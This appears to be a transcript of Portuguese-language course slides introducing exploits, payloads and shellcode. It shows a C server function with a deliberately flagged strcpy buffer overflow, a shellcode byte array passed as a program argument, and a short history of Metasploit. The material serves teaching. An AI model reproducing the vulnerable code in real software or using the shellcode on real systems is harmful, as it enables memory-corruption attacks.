apresentação exploit
TRANSCRIPT
COMPLEXIDADE DE ALGORITMOSProfessor Edson Lima
DENIS VIEIRANONDAS JUNIOR
EXPLOIT
Exploit, Payload e Shellcode
listen(Sock, 1);while(1){ Tam = sizeof(struct sockaddr_in); if((Novo=accept(Sock, (struct sockaddr *)&Cliente,&Tam))==1) exit(1); memset(Mens,0,strlen(Mens)); if(read(Novo,Mens,sizeof(Mens)) < 0) exit(2); TrataMensagem(Mens); close(Novo);}void TrataMensagem(char *Mens){ char Buffer[256]; strcpy(Buffer,Mens); /* VULNERABILIDADE: caso Mens seja maior que
256, haverá o estouro*/ }
unsigned char cod[]={0xeb,0x1f,0x90,0x90,0x90,0x90,0x5e,0x31,0xc0,0x88,0x46,0x07,0x89,0xf3,0xb0,0x08,0xb9,0xff,0xf1,0xff,0xff,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80,0x90,0x90,0x90,0x90,0xe8,0xe0,0xff,0xff,0xff,0};
Shellcode
Program.exe param1, pram2, cod
ARMITAGE – MSFCONSOLE - MFSCL
O metasploit e ferramenta utilizada em grande escala por profissionais de
segurança. Desenvolvido por HD Moore especialista em segurança,
teve sua primeira versão escrita em Perl e lançada em Outubro de 2003,
a versão 2.0 de Abril de 2004 reescrita em Ruby contava com 19 exploits e alguns payloads. Em 2009, a empresa Rapid7
adquire o projeto Metasploit e a ferramenta ganha força da comunidade envolvida em segurança da informação.
ARMITAGE
MSFCONSOLE
MFSCL
Conficker
RPC DCOM
